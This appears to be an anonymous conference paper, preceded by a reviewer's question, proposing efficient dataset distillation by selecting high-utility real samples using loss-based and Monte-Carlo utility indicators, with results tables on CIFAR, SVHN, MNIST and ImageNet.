Q3: Tables 1 + 2: There are several instances where the minimal data ratio for higher IPC is lower. Why does this happen, and why for these specific examples (e.g., CAFE for CIFAR10 + MNIST, or MTT for CIFAR10)?
DISTILL GOLD FROM MASSIVE ORES: EFFICIENT DATASET DISTILLATION VIA CRITICAL SAMPLES SELECTION

Anonymous authors
Paper under double-blind review

ABSTRACT

Data-efficient learning has drawn significant attention, especially given the current trend of large multi-modal models, where dataset distillation can be an effective solution. However, the dataset distillation process itself is still very inefficient. In this work, we model the distillation problem with reference to information transport. Observing that severe data redundancy exists in dataset distillation, we argue for putting more emphasis on the utility of the training samples. We propose a family of methods to exploit the most valuable samples, validated by our comprehensive analysis of the optimal data selection. The new strategy significantly reduces the training cost and extends a variety of existing distillation algorithms to larger and more diversified datasets, e.g., in some cases only 0.04% of the training data is sufficient for comparable distillation performance. Moreover, our strategy consistently enhances performance, which may open up new analyses of the dynamics of distillation and networks. Our method is able to extend the distillation algorithms to much larger-scale and more heterogeneous datasets, e.g., ImageNet-1K and Kinetics-400. Our code will be made publicly available.

1 INTRODUCTION

Data is crucial for deep learning. Data-efficient learning, which enables high performance at lower cost, has become critical, especially in the era of large data and models (Brown et al., 2020; Schuhmann et al., 2021), when the size and complexity of models continue to grow. Techniques such as pruning, quantization, and knowledge distillation have been used to reduce model size without sacrificing performance. Recently, dataset distillation (Wang et al., 2018) has become a promising way towards data-efficient AI, where a small and condensed dataset (synthetic) is learned from the whole large dataset (real), such that models trained on the synthetic data maintain the performance of models trained on the real data.

However, the efficiency of dataset distillation itself poses a major obstacle to its own application. Currently, the distillation process takes substantially more time than training a model on the full dataset, which is somewhat "penny-wise and pound-foolish". For example, the training of expert trajectories for MTT (Cazenavette et al., 2022) takes $100 \times$ longer than training a model on the full real dataset. The prohibitive computation and memory requirements make dataset distillation inapplicable as the data scale and instances-per-class (IPC) increase, especially for modern large-scale models and datasets whose size can grow to the order of billions (Brown et al., 2020; Radford et al., 2021; Schuhmann et al., 2021). Existing works address efficient distillation by reducing the storage burden of synthetic data via data compression (Kim et al., 2022b; Liu et al., 2022; Qiu et al., 2022; Deng & Russakovsky, 2022) or by optimizing the training workflow (Cui et al., 2022), while no prior work has adequately addressed the efficiency of data utilization.

In this paper, we seek a novel efficient strategy to exploit massive real data, by first modeling the dataset distillation problem from the information transport point of view. Specifically, the distillation process can be regarded as a "knowledge" flow from the real dataset to the synthetic dataset, and finally to the network.
Since the synthetic data is much smaller than the real data, its capacity is limited, and thus the knowledge flow meets a "bottleneck" at the synthetic data. A natural assumption then arises: we can choose the most valuable real samples (those carrying the most knowledge) and drop the others without blocking the knowledge flow.

Figure 1: Severe data redundancy in dataset distillation. (1) Left: with our optimal selection policy, only 0.04% of real samples are sufficient for distillation, and 10% optimal real samples outperform the full real dataset. (2) Right: each arrow indicates an algorithm, pointing from the performance on full data to that with our strategy. Our strategy enables the distillation of large-scale heterogeneous datasets and significantly reduces the training cost while maintaining or enhancing the performance.

The slimmest real-data subset encompassing enough knowledge for distillation can then be obtained. Based on this perspective, we observe that real data can be highly redundant and insensitive to data reduction in dataset distillation. For instance, on CIFAR10 with DC (Zhao et al., 2020) and a single instance per class (IPC=1), randomly removing 90% of the real data does not affect performance. More importantly, if carefully selected, even 20 images (0.04% of the full dataset) suffice for comparable performance. This phenomenon widely exists among various datasets, networks, methods, and IPCs, which we detail in Sec. 3.1. This observation supports the feasibility of data-efficient distillation, enabling us to deal with massive real datasets. We argue that leveraging data redundancy bears even more significance for dataset distillation due to the "knowledge bottleneck".

In light of these observations, we provide a thorough analysis and study of data-efficient distillation. We first define the knowledge content of a set of data samples in terms of its data utility, indicating the value or quality of the data. To efficiently and effectively find the optimal real-data subset, we propose a family of utility estimation and optimal data selection policies. We compare various criteria that encode the utility of data samples, including data density, gradient, training loss, etc., and derive certain criteria that prove especially effective. Our strategy can greatly reduce the training cost and enable larger-scale experiments with shorter training times. Furthermore, we find that careful data selection can sometimes even enhance distillation, which indicates that some samples may be "harmful" to the training. With the data utility, we propose a simple but effective baseline tool that exploits the bias toward high-utility samples to maximize the distillation performance. Our method achieves stable performance gains without pre-computation of data utility.

With better efficiency, we can handle the whole of ImageNet-1K (Deng et al., 2009) and even more heterogeneous data such as videos from Kinetics (Carreira & Zisserman, 2017). Our work is the very first to distill the Kinetics-400 dataset with acceptable efficiency. We also provide deeper insight into the internal mechanisms of dataset distillation and neural network training. Overall, our contributions are: 1) we propose the first work on analyzing and modeling data-efficient distillation to greatly reduce the computational complexity; 2) we propose estimators and methods that exploit the data utility to advance dataset distillation; 3) using the proposed methods, we can efficiently distill very large-scale datasets.
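As a concrete illustration of the redundancy probe described in this introduction (and detailed in Sec. 3.1), here is a minimal Python sketch. The `distill_and_eval` wrapper and the drop-rate grid are hypothetical stand-ins for any distillation pipeline (DC, DSA, DM, MTT, ...).

```python
import numpy as np

def random_drop_ablation(num_real, drop_rates, distill_and_eval, seed=0):
    # Redundancy probe: randomly remove a fraction of the real data before
    # distillation and record the resulting accuracy of a model trained on
    # the synthetic set distilled from the kept subset.
    rng = np.random.default_rng(seed)
    results = {}
    for rate in drop_rates:  # e.g., [0.0, 0.5, 0.9, 0.99, 0.9996]
        n_keep = max(1, int(num_real * (1 - rate)))
        keep = rng.choice(num_real, size=n_keep, replace=False)
        results[rate] = distill_and_eval(keep)
    return results
```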
2 RELATED WORK

Dataset Distillation is the process of compressing a large dataset into a smaller and more representative dataset while maintaining performance. The existing approaches can be roughly classified into: 1) Meta-Model Matching maintains the transferability of the synthetic data by optimizing the empirical loss on the original dataset of models trained on the synthetic data. Wang et al. (2018) first propose the task of data distillation and use the meta-model matching framework for optimization. Nguyen et al. (2020) exploit kernel ridge regression to facilitate the inner optimization loop, which is further extended to infinitely wide networks (Nguyen et al., 2021). Zhou et al. (2022) separate the optimization of the synthetic data/classifier and the feature extractor. 2) Gradient Matching (Zhao et al., 2020) aligns the gradients of the synthetic and real datasets and is further improved by Zhao & Bilen (2021), who perform the same image augmentations on both the real and synthetic data. 3) Distribution Matching (Zhao & Bilen, 2023) matches the feature distributions of the synthetic and real data, which is simple but effective. Wang et al. (2022) design layer-wise feature alignment and a few early-exit conditions to promote DM. Zhao et al. (2023) further enhance DM with regularizers and a model pool. 4) Trajectory Matching: Cazenavette et al. (2022) propose to match the training trajectories of the model parameters, by aligning the future parameters trained on real data and synthetic data. Cui et al. (2022) reduce the memory consumption of MTT and exploit label learning. 5) Factorization of the synthetic data can reduce the storage burden and share knowledge among instances. Kim et al. (2022b) use a strategy of putting multiple images on one synthetic sample. Deng & Russakovsky (2022) decompose the synthetic data into linear combinations of bases. Liu et al. (2022) use a hallucination network to combine the bases. Lee et al. (2022) maintain a smaller base space to further reduce the storage. 6) Bayesian Pseudocoreset is a family of algorithms that learn the synthetic data with Bayesian inference (Manousakas et al., 2020; Kim et al., 2022a; Tiwary et al., 2023).

Data Selection/Pruning reduces the training data without significantly affecting performance. Classic data selection often calculates a scalar utility score for each sample based on predefined criteria (Castro et al., 2018; Sener & Savarese, 2017; Toneva et al., 2018) and filters the samples based on these scores. Some data pruning methods also consider the interactions between samples. Yang et al. (2022) examine the generalization influence to reduce training data, aiming to identify the smallest subset that satisfies the expected generalization ability. In comparison, data distillation (Wang et al., 2018) and data condensation (Zhao et al., 2020) synthesize new and smaller data. Data distillation significantly outperforms data pruning at the same number of images per class (IPC).

3 PRELIMINARIES

Data redundancy widely exists in various machine learning tasks. After conducting thorough experiments and comparisons, we first argue that data redundancy is extremely severe in distillation (Sec. 3.1). Then, we model the dynamics of dataset distillation to explain our observations (Sec. 3.2).

3.1 DATA REDUNDANCY IN DATASET DISTILLATION

Dataset distillation learns a small synthetic dataset from the larger real dataset.
To support the general observation that a real dataset is redundant for the distillation task, we first conduct an ablation study on real datasets by randomly removing a portion of the real data before the distillation process. We show an example in Fig. 2 on CIFAR10 with the DC (Zhao et al., 2020) algorithm and IPC=1. After randomly dropping real data, the distillation performance remains stable until the drop rate exceeds 90%. With some other selection criteria (e.g., the classification loss value of each sample), the drop rate can be further increased to 99.96%, i.e., 20 samples are sufficient for comparable accuracy. Removing some samples even enhances the distillation accuracy. This simple experiment indicates that real data can be extremely redundant for dataset distillation, and that some samples may even be "harmful". For further discussion, we first introduce key definitions pertinent to critical samples:

Definition 1. Given a real dataset \( D \) with size \( m \), for a data selection policy \( \pi \), we say \( \Gamma(\pi) \in \mathbb{N} \) is the critical sample size if \( \Gamma(\pi) \) is the minimal size s.t. the \( \Gamma(\pi) \) samples in \( D \) selected by the policy \( \pi \) are weakly \( \epsilon \)-close to the full dataset \( D \). The critical sample ratio is \( \gamma(\pi) = \Gamma(\pi)/m \).

Here we borrow the definition of \( \epsilon \)-closeness (Nguyen et al., 2020): two datasets are weakly \( \epsilon \)-close if the models trained on each dataset are close in terms of the empirical loss value. We use the 0-1 loss function in the following discussion, so two datasets being weakly \( \epsilon \)-close means the models trained on them have similar distillation accuracy. Therefore, the critical sample ratio is the minimal data ratio that preserves the overall distillation performance with respect to a certain data selection policy; e.g., the experiment in Fig. 2 indicates \( \gamma(\pi) = 0.1 \) when \( \pi = \) random. A smaller critical sample ratio indicates more redundancy in the given real dataset and more freedom to prune the data. Note that \( \gamma(\pi) \) may vary among different real and synthetic dataset settings and distillation algorithm settings.

Table 1: Comparison of $\gamma(\text{rand})$ among datasets, distillation algorithms, and synthetic data sizes, i.e., the minimal data ratio for comparable distillation accuracy (columns beyond those shown were not recoverable).

| Method | CIFAR10, IPC=1 | CIFAR10, IPC=10 | CIFAR10, IPC=50 | CIFAR100, IPC=1 | CIFAR100, IPC=10 |
|--------|----------------|-----------------|-----------------|-----------------|------------------|
| DC | 10% | 30% | 50% | 50% | 40% |
| DSA | 15% | 30% | 30% | 60% | 40% |
| DM | 15% | 40% | 50% | 30% | 15% |
| MTT | 40% | 90% | 80% | 80% | 90% |

Table 2: $\gamma(\text{rand})$ on more distillation algorithms.

| Dataset | IPC | CAFE | LinBa | IDC |
|---------|-----|------|-------|------|
| CIFAR10 | 1 | 15% | 70% | 50% |
| | 10 | 11% | 30% | 10% |
| SVHN | 1 | 30% | 50% | 60% |
| | 10 | 60% | 60% | 30% |
| MNIST | 1 | 10% | 30% | 0.5% |
| | 10 | 1% | 40% | 40% |

Table 3: $\gamma(\text{rand})$ among various initializations on CIFAR10.

| IPC | Init | DC | DM |
|-----|-------|-----|-----|
| 1 | noise | 10% | 10% |
| | real | 10% | 15% |
| | herd | 10% | 15% |
| 10 | noise | 30% | 30% |
| | real | 30% | 40% |
| | herd | 30% | 30% |

Table 4: $\gamma(\text{rand})$ among various networks on CIFAR10.

| IPC | Net | DC | DM |
|-----|---------|-----|-----|
| 1 | Conv | 10% | 15% |
| | MLP | 3% | 5% |
| | ResNet | 5% | 15% |
| | VGG | 10% | 5% |
| | AlexNet | 5% | 5% |
| 10 | Conv | 30% | 40% |
| | MLP | 40% | 40% |
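Definition 1 suggests a direct, if expensive, estimation procedure for $\Gamma(\pi)$. The sketch below is a minimal Python version; the increasing search grid and the accuracy-based closeness test are our assumptions about the protocol.

```python
def critical_sample_size(order, sizes, distill_and_eval, full_acc, eps):
    # Estimate Gamma(pi) of Definition 1: `order` lists real-data indices
    # ranked by the policy pi (most valuable first); `sizes` is an increasing
    # search grid. Weak eps-closeness is tested via distillation accuracy.
    for n in sizes:
        if distill_and_eval(order[:n]) >= full_acc - eps:
            return n
    return len(order)

# The critical sample ratio is then gamma(pi) = Gamma(pi) / len(order).
```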
Then we conduct more comprehensive comparison experiments on various datasets (Krizhevsky et al., 2009; Netzer et al., 2011; LeCun et al., 1998; Le & Yang, 2015), networks, distillation algorithms (Zhao et al., 2020; Zhao & Bilen, 2021, 2023; Cazenavette et al., 2022; Wang et al., 2022; Deng & Russakovsky, 2022; Kim et al., 2022b), initialization methods, and synthetic data sizes (represented by instances-per-class, IPC). We randomly drop some portions of the real data to find the critical sample ratio under random data selection ($\gamma(\text{rand})$). We take the mean and standard deviation of the accuracy over 5 random removal trials. We use the default parameters of each method, detailed in Appendix Sec. F. The results are shown in Tab. 1, 2, 3, 4, which show that severe data redundancy widely exists in various dataset distillation settings. Some experiments on TinyImageNet at high IPC are not reported (marked with "–") due to the high computation cost, and MTT exceeds our GPU memory limit. In most datasets and algorithms, fewer than 30% of the samples are sufficient for dataset distillation. We also observe some basic patterns:

1. A larger synthetic data size leads to a larger critical sample ratio.
2. Better distillation algorithms have larger critical sample ratios; e.g., MTT performs better than DC and has larger critical sample ratios.
3. Initialization and architecture have only a minor influence on the critical sample ratio.

These observations indicate that we can use only a small subset of real data samples to reduce the training cost and to enable the optimization of the dataset distillation workflow from the perspective of real-data utilization. Consequently, the goal of data-efficient distillation is to find the optimal data selection policy $\pi$ that minimizes the critical sample ratio $\gamma(\pi)$, or formally:

**Definition 2.** A data selection policy is an optimal selection $\pi^*$ iff: $\pi^* = \arg\min_\pi \gamma(\pi)$.

### 3.2 The Information Transport Perspective of Dataset Distillation

To support the analysis of the optimal data selection policy $\pi^*$, we first revisit dataset distillation through the lens of information theory. The dataset distillation workflow can be regarded as the transport of "knowledge" from real data to synthetic data and, finally, to the classification model during training. We informally define the "knowledge" contained in a set of data samples $D$ as their utility, denoted $U(D)$. The samples with larger utility are more valuable for learning.

Figure 3: Data utility. The small capacity of synthetic data leads to a "bottleneck" of utility (right top). Thus, we seek an optimal selection policy that reduces real data while maintaining sufficient data utility, hence preserving or even enhancing the distillation performance. The right bottom figure shows the mean-field view of dataset utility and the corresponding greedy data selection strategy.

During the training process, the utility capacity of the classification model is limited, with the full data usually exceeding the capacity of the model. This gives rise to the popular data selection and distillation methods, as minor data reduction does not degrade model performance. When we further consider the distillation step, the capacity of synthetic data is also limited and far smaller than that of the full data. The size of synthetic data is often less than 1% of the whole dataset.
Hence the utility flow from real data to synthetic data to the classification model forms a "bottleneck" structure, as shown in Fig. 3. In this case, dataset distillation has much more potential for data selection and data curation, and it is both feasible and critical to analyze the critical samples in the dataset. We denote the maximum utility that the synthetic data can absorb as $U_{syn}$. As long as the real data utility exceeds $U_{syn}$, the distillation performance is maintained. Thus, we can define the optimal selection policy more specifically ($\text{card}(\cdot)$ measures the cardinality of a set):

**Definition 3.** Optimal data selection is to find $\mathcal{X}^* = \arg\min_{\mathcal{X} \subset D} \text{card}(\mathcal{X}), \ s.t. \ U(\mathcal{X}) \geq U_{syn}$.

This modeling of dataset distillation also explains the patterns observed in the previous ablation experiments:

1. A larger synthetic set has larger $U_{syn}$, so more data are required to fill the utility capacity.
2. The synthetic data can receive more "knowledge" when using a superior distillation algorithm, i.e., $U_{syn}$ is increased, so the critical sample ratio increases.
3. The network architecture and initialization methods affect neither the samples' utility nor $U_{syn}$, so they have only a minor influence on the critical sample ratio.

### 4 Estimating Data Utility

#### 4.1 Mean-field View of Data Utility

However, the above optimal selection is intractable and hard to optimize. To address this problem, we borrow the idea of mean-field theory from physics, which has been widely adopted in machine learning (Ranganath et al., 2014). Mean-field theory is a mathematical approach to understanding the behavior of large and complex systems with many interacting parts. The theory simplifies a complex system by assuming that each part of the system is influenced only by the average behavior of the other parts, so that individual parts can be approximated by simpler independent systems. In the case of data utility, we apply a mean-field approximation to decompose the utility of a set of data $U(D)$ into the combination of the utilities of the individuals $u(x_i)$:

$$U(D) = U(\{x_1, x_2, \cdots, x_m\}) = u(x_1) + u(x_2) + \cdots + u(x_m). \tag{1}$$

Although this approximation omits the high-order interactions of utility between multiple samples, the mean-field form of $U(D)$ greatly simplifies the optimal selection policy: we can greedily select the samples with the largest utility values until the total utility exceeds $U_{syn}$ (Fig. 3). In the following sections, we provide a comprehensive study of various indicators that are correlated with, and can reflect, the utility of data samples. These indicators are then employed in the data selection policy. More complex factors involving high-order interactions are discussed in Sec. 4.4.

### 4.2 Mean-field Indicators of Data Utility

In this section, we present the data utility indicators under the mean-field view, i.e., each sample is assigned a scalar that is positively related to its utility, followed by a thorough empirical comparison.

#### a) Heuristic Indicators.

We first describe some heuristic data utility indicators, which reflect the data distribution and the samples' training properties. The implementations are available in Appendix Sec. F.4.

1. **Classification Loss** indicates the learning difficulty of samples and distinguishes hard and easy cases. We train the classification model for 50~100 epochs over 50 experiment trials and take the average loss value of the last 10 epochs.
2. **Data density** around a sample depicts its scarcity and uniqueness. We first train a feature extractor on the dataset and extract feature vectors. For each sample, we compute the mean distance to its K nearest neighbors in the same class. A negative sign is applied so that the score acts as a density estimator.

3. **Distance to the cluster center.** Similar to (Liu et al., 2023), we adopt K-Means to explore the sub-cluster structure of each class. For each sample, we compute its distance to the nearest cluster center. The sub-cluster number is set to 128 by default.

4. **Distance to the initial image.** The utility of real samples may differ due to the initialization of the synthetic data; e.g., under real-image initialization, the initial images may have less value since they already constitute the synthetic data themselves. We measure the L2 distance of each sample to the initial synthetic data using the same feature extractors as in the density estimation.

#### b) Monte-Carlo Indicator.

More directly, we propose a Monte-Carlo method to estimate the sample utility from the distillation accuracy. In the analysis in Sec. 3.2, we argued that if the data utility $U(\mathcal{X})$ is less than the capacity $U_{syn}$, the performance drops. That is, when the data utility is small, the distillation accuracy reflects the utility value and is an ultimate indicator of utility. Thus, we can estimate the sample utility with a randomized algorithm. We first select a data size $M$ that is less than $\Gamma(\text{rand})$ to ensure $U(\mathcal{X}) < U_{syn}$. We repeat multiple trials (1000 by default) of randomly sampling a subset $\mathcal{X}_j$ of size $M$ from the real dataset and use the distillation accuracy $s_j$ as an indicator of the utility $U(\mathcal{X}_j)$. If the $i$-th sample $x_i$ is visited in $T$ trials, its utility can be estimated as the average accuracy of these trials (Eq. 2). Considering both the mean-field assumption and the law of large numbers, the indicator is linear in the intrinsic sample utility $u(x_i)$ when $T$ is large:

$$\tilde{u}(x_i) = \frac{1}{T} \sum_{j: \mathcal{X}_j \ni x_i} s_j = \frac{1}{T} \sum_{j: \mathcal{X}_j \ni x_i} U(\mathcal{X}_j) \overset{T \to \infty}{\longrightarrow} \frac{N - M}{N - 1} u(x_i) + \frac{(M - 1)N}{N - 1} \mathbb{E}(u(x)), \tag{2}$$

since the second term is a constant and $(N - M)/(N - 1) > 0$. We prove Eq. 2 in the appendix.

#### Comparison of Utility Indicators.

We compare the above utility indicators via two evaluation protocols. Appendix Sec. B gives the full experimental results and an extra comparison to coreset selection algorithms.

**I. Stratified analysis of utility.** We sort the samples by their utility and split the dataset into a few subgroups with monotonically increasing utility values. By conducting distillation on each group, we can evaluate whether the utility indicator induces an ideal total ordering of the samples. First, we identify the direction, or "polarity", of the indicators based on the results, e.g., whether the samples with larger utility are those with a larger or a smaller loss value. We find that the samples with larger utility are those with 1) a small loss value, 2) large density, 3) closer distance to cluster centers, 4) closer distance to initialization samples, or 5) larger Monte-Carlo utility. This indicates that distillation prefers common samples that are easier to learn rather than corner cases and outliers, which is consistent with our model in Sec. 3.2: due to the small capacity of the synthetic data, the algorithms tend to learn the easy samples and common patterns of the real dataset.
Second, we compare the proposed indicators. Most indicators can correctly distinguish the samples with high or low utility, except data density and initialization distance, which cannot accurately identify the large-utility samples. The loss value and the Monte-Carlo estimator are significantly superior to the rest, since they have better discriminating ability on both high- and low-utility samples.

**II. Critical sample ratio comparison.** We use the utility estimates to greedily select samples, and compare the resulting critical sample ratios $\gamma(\pi)$ in various settings. Among the utility indicators, classification loss and the Monte-Carlo method significantly reduce the critical sample ratio to below 1%, i.e., the samples selected by them are more critical for dataset distillation.

Table 5: Comparison of $\gamma(\text{loss})$ among datasets, distillation algorithms, and synthetic data sizes, i.e., the minimal data ratio for comparable distillation accuracy (columns beyond those shown were not recoverable).

| Method | CIFAR10, IPC=1 | CIFAR10, IPC=10 | CIFAR10, IPC=50 | CIFAR100, IPC=1 |
|--------|----------------|-----------------|-----------------|-----------------|
| DC | 0.5% | 70% | 30% | 5% |
| DSA | 0.5% | 40% | 15% | 3% |
| DM | 0.5% | 50% | 60% | 0.5% |
| MTT | 40% | 80% | 80% | 40% |

Table 6: Comparison of $\gamma(\text{loss})$ on more distillation algorithms.

| Dataset | IPC | CAFE | LinBa | IDC |
|---------|-----|------|-------|-----|
| CIFAR10 | 1 | 0.2% | 40% | 15% |
| | 10 | 11% | 20% | 5% |
| SVHN | 1 | 40% | 80% | 70% |
| | 10 | 1% | 70% | 80% |

Figure 4: The comparison of $\gamma(\text{rand})$ and $\gamma(\text{loss})$: the arrows point from $\gamma(\text{rand})$ to $\gamma(\text{loss})$. Green: selection by loss is superior to random; red: selection by loss is inferior to random.

Despite their comparable performance, the Monte-Carlo method is far less efficient and less applicable due to its slow convergence: e.g., for CIFAR10, we distill from 5% of the real data 1000 times, which takes over 100× the time of the distillation itself. Thus, we argue that the loss value is the most effective and efficient data utility indicator; it is utilized and discussed in the following sections. Among the other criteria, the data density and clustering methods also perform above random selection, though inferior to loss and Monte-Carlo, showing that data distribution clues also help find valuable samples. In contrast, the initialization distance does not give a meaningful sample ordering.

4.3 Extended Discussion on The Loss Indicator

Considering both the performance and the computational complexity, the loss value is the better estimator of data utility. Thus we propose to use the loss utility indicator in the greedy selection method. We conducted an in-depth study of the loss value and have the following observations.

**Dropping by loss consistently outperforms random selection.** We extend the critical sample ratio experiments to $\gamma(\text{loss})$ with the loss utility indicator on 4 datasets, 7 algorithms, and 3 IPC settings, as shown in Tab. 5 and 6. Experiments on more SOTA algorithms can be found in Appendix Sec. B.3. We also show the comparison between random selection and selection by loss in Fig. 4. Greedy selection by loss consistently outperforms random selection. In most cases, the critical sample ratios are < 10%, significantly reducing the training cost. We also find that dropping data does not hurt transferability (Appendix Sec. D).

**Dropping by loss can enhance distillation.** Surprisingly, we also observe that dropping real data can improve performance.
We show the best performance during data dropping in Tab. 7 for DC, DSA, DM, and MTT. In almost all cases, data selection notably promotes distillation accuracy. This may imply that some samples have negative utility and are detrimental to distillation. With accurate utility estimation, greedy selection can cancel these negative impacts. This observation inspires new approaches that leverage the data utility and exploit data samples of differing quality, enabling future analyses of network dynamics and dataset distillation. Appendix Secs. B.3 and C show more support for SOTA methods and an explanation from the variance/outlier perspective.

**Early-epoch loss in very few trials is also accurate for selection.** "As the twig is bent, so is the tree inclined." We find that the loss values in very early classification epochs are informative enough for data selection, probably because the early dynamics of samples can reflect their training difficulty and importance. Moreover, the number of trials used to obtain the loss values has little influence on the selection performance, as shown by the empirical results on CIFAR10 with IPC=1 and DC. We take the average loss curves of 1, 5, 10, and 50 trials of classification, and take the mean loss value over the first 1, 5, 10, and 100 epochs (training converges at around 100 epochs). In Fig. 5, we use the same stratification method as in Sec. 4.2 to evaluate the sample ordering induced by the loss values.

Table 7: Best performance with data dropping. Each entry shows the accuracy using x% of the real data, with the gain over the full dataset shown in parentheses as (+gain, x%) (†: compared to our reproduced accuracy).

| Dataset | IPC | DC | DSA | DM | MTT |
|-------------|-----|------|------|------|------|
| CIFAR10 | 1 | 30.0±0.1 (+1.7, 5%) | 30.9±0.1 (+2.6, 20%) | 29.7±0.3 (+3.7, 5%) | 46.3±0.8 (+0.2, 80%) |
| | 10 | 44.9±0.4 (+0.0, 70%) | 52.4±0.2 (+0.2, 50%) | 50.0±0.2 (+1.1, 50%) | 65.7±0.3 (+0.4, 90%) |
| | 50 | 54.9±0.5 (+1.0, 60%) | 61.5±0.7 (+0.9, 20%) | 63.4±0.2 (+0.4, 60%) | 72.0±0.4 (+0.4, 95%) |
| CIFAR100 | 1 | 14.1±0.1 (+1.3, 20%) | 15.6±0.1 (+1.7, 20%) | 14.9±0.5 (+3.5, 10%) | 24.6±0.0 (+0.3, 90%) |
| | 10 | 26.5±0.3 (+1.3, 30%) | 32.5±0.4 (+0.2, 30%) | 32.4±0.3 (+2.7, 50%) | 40.1±0.5 (+0.0, 80%) |
| SVHN | 1 | 32.2±0.5 (+1.0, 20%) | 28.9±1.3 (+0.1, 40%) | 29.8±0.5 (+6.3, 20%) | 43.0±1.1 (+3.2, 10%) |
| | 10 | 76.2±0.6 (+0.1, 40%) | 80.0±0.8 (+0.8, 70%) | 74.6±0.3 (+0.9, 30%) | 78.1±0.5 (+0.9, 20%) |
| TinyImageNet | 1 | 4.9±0.1 (+0.2†, 30%) | 4.3±0.0 (+0.6†, 5%) | 4.8±0.1 (+0.9, 10%) | 9.0±0.4 (+0.2, 10%) |
| | 10 | 12.8±0.0 (+0.2†, 20%) | - | 17.5±0.1 (+4.6, 30%) | - |

Figure 5: Stratified distillation performance for different numbers of classification trials and epochs. An ideal stratification yields a monotonically increasing performance curve. (See Appendix Fig. 7 for the full figure.)

Tab. 8 lists the corresponding critical sample ratios. Most loss values produce a good stratification and thus have very small $\gamma$; the best decrease $\gamma$ to 0.04%, i.e., 2 samples per class are enough for comparable performance under this selection criterion. Even some extreme settings, e.g., 5 trials of 1-epoch training, are sufficient for an informative loss value. Only extreme cases such as 1 epoch and 1 trial show degradation. These two observations can be utilized to substantially reduce the computational burden of generating loss values, which can now be ignored or naturally embedded in the distillation process itself, extending our paradigm to broader applications.
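Since the loss indicator is the workhorse of the following sections, here is a minimal PyTorch sketch of the early-epoch variant. The optimizer, hyperparameters, and the assumption that the dataset yields (image, label, index) triples are ours for illustration.

```python
import torch
import torch.nn.functional as F

def early_loss_utility(make_model, dataset, n_trials=5, n_epochs=5,
                       lr=0.01, device="cuda"):
    # Loss utility indicator: average the per-sample loss over a few early
    # epochs and a few trials. Low average loss => high utility, so the
    # greedy policy keeps samples in ascending order of this score.
    loader = torch.utils.data.DataLoader(dataset, batch_size=256, shuffle=True)
    score = torch.zeros(len(dataset))
    for _ in range(n_trials):
        model = make_model().to(device)
        opt = torch.optim.SGD(model.parameters(), lr=lr, momentum=0.9)
        for _ in range(n_epochs):
            for x, y, idx in loader:  # dataset assumed to return sample indices
                loss = F.cross_entropy(model(x.to(device)), y.to(device),
                                       reduction="none")
                opt.zero_grad()
                loss.mean().backward()
                opt.step()
                score[idx] += loss.detach().cpu() / (n_trials * n_epochs)
    return score  # greedy order: torch.argsort(score) (smallest loss first)
```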
4.4 Higher-order Interaction of Data Utility

In Sec. 4.1 we leveraged a mean-field approximation to simplify the data utility, and the experiments and discussion above justify this simplification. However, higher-order information and interactions between samples do exist, and in some extreme scenarios these interactions cannot be ignored. For example, data diversity is a higher-order utility indicator, since it is a property of the population rather than of any individual. We observe that diversity affects dataset distillation: the data utility paradigm consistently performs poorly on the MNIST dataset. We conduct stratified experiments on MNIST with the loss value indicator and observe that both the subgroup with large loss ($S_{10}$) and the subgroup with small loss ($S_{1}$) have lower accuracy, which is due to the vanishing diversity in the small-loss subgroups. We use the quotient of intra-class variance and inter-class variance as the diversity metric (a larger value indicates larger diversity); a sketch of this metric is given after the tables below. As shown in Fig. 6, only MNIST severely loses diversity in the subgroups with small loss. This phenomenon also appears with other utility indicators such as data density, and it spoils the data utility paradigm, reflecting the impact of higher-order interactions of data utility. It is challenging to incorporate diversity without sacrificing the efficiency of our paradigm (e.g., by leveraging annealing or Monte-Carlo algorithms), so we leave this to future work. An in-depth discussion and modeling of higher-order data utility involves complex systems, which is beyond our scope. It is worth noting that the impact of vanishing diversity is negligible in most realistic scenarios (e.g., CIFAR), especially for large-scale datasets, due to their large overall diversity. We provide the stratified visualization in Appendix Sec. G.2.2.

Table 8: Comparison of $\gamma(\text{loss})$ for different numbers of classification trials and epochs.

| Trial Number | 1 Epoch | 5 Epochs | 10 Epochs | 100 Epochs |
|--------------|---------|----------|-----------|------------|
| 1 | 10% | 0.3% | 0.2% | 0.1% |
| 5 | 0.2% | 0.04% | 0.1% | 0.1% |
| 10 | 0.2% | 0.04% | 0.04% | 0.04% |
| 50 | 0.2% | 0.1% | 0.2% | 0.1% |

Table 9: Performance of state-of-the-art methods and our runtime pruning approach (†: reproduced accuracy).

| Dataset | IPC | DSA | DM | MTT | DC | IDC | DC+Ours | IDC+Ours | Full dataset |
|-----------|-----|----------|----------|----------|----------|-----------|----------|----------|--------------|
| CIFAR10 | 1 | 28.8±0.7 | 26.0±0.8 | 46.3±0.8 | 28.3±0.5 | 55.3±0.3† | 29.3±0.1 | 56.1±0.3 | 84.8±0.1 |
| | 10 | 52.1±0.5 | 49.9±0.6 | 65.6±0.7 | 44.9±0.5 | 65.0±0.5† | 45.1±0.4 | 65.3±0.1 | |
| CIFAR100 | 1 | 13.9±0.3 | 11.4±0.3 | 24.3±0.3 | 12.8±0.3 | 31.3±0.2† | 13.2±0.4 | 32.1±0.2 | 56.2±0.3 |
| | 10 | 32.3±0.3 | 29.7±0.3 | 40.1±0.4 | 25.2±0.3 | 40.8±0.3† | 25.9±0.5 | 41.3±0.4 | |
| SVHN | 1 | 27.5±1.4 | - | - | 31.2±1.4 | 68.7±0.6† | 31.7±0.7 | 70.0±0.7 | 95.4±0.1 |
| | 10 | 79.2±0.5 | - | - | 76.1±0.6 | 82.7±0.6† | 76.6±0.4 | 83.0±0.2 | |
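The diversity metric referenced in Sec. 4.4 above is simple enough to state precisely. Below is a minimal numpy sketch; the choice of feature extractor producing the feature vectors is our assumption.

```python
import numpy as np

def diversity(features, labels):
    # Quotient of intra-class variance and inter-class variance over feature
    # vectors; a larger value indicates larger diversity.
    mu = features.mean(axis=0)
    intra, inter = 0.0, 0.0
    for c in np.unique(labels):
        fc = features[labels == c]
        mu_c = fc.mean(axis=0)
        intra += ((fc - mu_c) ** 2).sum()
        inter += len(fc) * ((mu_c - mu) ** 2).sum()
    return intra / inter
```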
Table 10: Dataset distillation on large-scale image and video datasets (est. = estimated).

| Dataset | IPC | Algorithm | Full Data: Accuracy | Full Data: Training Time | With Selection (Ours): Accuracy | With Selection (Ours): Training Time | Random Real |
|---------------|-----|-----------|---------------------|--------------------------|---------------------------------|--------------------------------------|-------------|
| ImageNet-1K | 1 | DC | 1.79±0.04 | 23.6h | 1.93±0.06 | 17.2h | 0.43±0.02 |
